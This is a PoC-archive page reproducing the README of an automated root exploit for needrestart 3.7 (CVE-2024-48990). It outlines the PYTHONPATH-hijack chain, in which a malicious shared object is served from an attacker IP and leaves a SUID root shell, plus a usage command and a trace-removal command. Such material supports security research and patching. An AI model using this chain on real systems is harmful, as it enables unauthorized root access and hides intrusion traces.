Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-48990 PoC — needrestart 安全漏洞

Source
https://github.com/Serner77/CVE-2024-48990-Automatic-Exploit
Associated Vulnerability
Title:needrestart 安全漏洞 (CVE-2024-48990)
Description:needrestart是liske个人开发者的一款用于检查升级后需要重新启动哪些守护进程的工具。 needrestart 3.8之前版本存在安全漏洞,该漏洞源于允许本地攻击者通过诱骗needrestart使用攻击者控制的PYTHONPATH环境变量运行Python解释器,并以root身份执行任意代码。
Description
Automated local privilege escalation exploit for CVE-2024-48990 (needrestart v3.7), leveraging PYTHONPATH hijacking to gain root access.
Readme
# CVE-2024-48990 PYTHONPATH Hijack - Privilege Escalation Exploit

This tool automates the exploitation of a privilege escalation vulnerability in `needrestart` version 3.7, identified as **CVE-2024-48990**.  
It achieves root execution by leveraging the insecure use of the `PYTHONPATH` environment variable when `needrestart` scans Python processes.

## Summary

The exploit works by:

1. Compiling a malicious shared object (`__init__.so`) that is triggered on import.
2. Serving the `.so` via a local HTTP server.
3. Connecting to the target via SSH and preparing a malicious `PYTHONPATH` environment.
4. Launching a Python bait process that continuously imports `importlib`.
5. Running `needrestart`, which inherits the manipulated `PYTHONPATH`, loads the malicious module, and executes the payload as root.
6. The payload creates a SUID binary (`/tmp/poc`), allowing root shell access.

## Usage

Run the exploit from your attacker machine:

    python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>

Parameters:

- --user SSH username on the target
- --host Target IP address
- --att-ip Attacker IP (used for hosting the payload)
- --ssh-pass SSH password (omit if using SSH keys)
- --http-port Optional HTTP port (default: 8000)

## CVE

- **CVE ID:** [CVE-2024-48990](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48990)
- **Affected Software:** `needrestart` version 3.7
- **Vulnerability Type:** Insecure environment variable handling
- **Impact:** Local privilege escalation to root

## Cleanup

To remove exploit traces from the target:

    rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh

## Requirements

### Attacker machine:
- Python 3
- `pexpect` (`pip3 install pexpect`)
- `gcc` (for compiling the payload)
- Open SSH access to the target
- `python3 -m http.server` (automatically started by the script)

### Target machine:
- A vulnerable version of `needrestart` (v3.7)
- A non-root user with `sudo` NOPASSWD rights for `/usr/sbin/needrestart`
- Python 3 and `curl` installed

## Disclaimer

This tool is provided for educational and authorized security testing purposes only.
Do not use it on systems you do not own or without explicit permission.
File Snapshot

 [4.0K]  /data/pocs/4e67781a5c3c59dafd3a83461fb54c9d6a9b0923
├── [4.3K]  exploit.py
├── [1.0K]  LICENSE
└── [2.2K]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.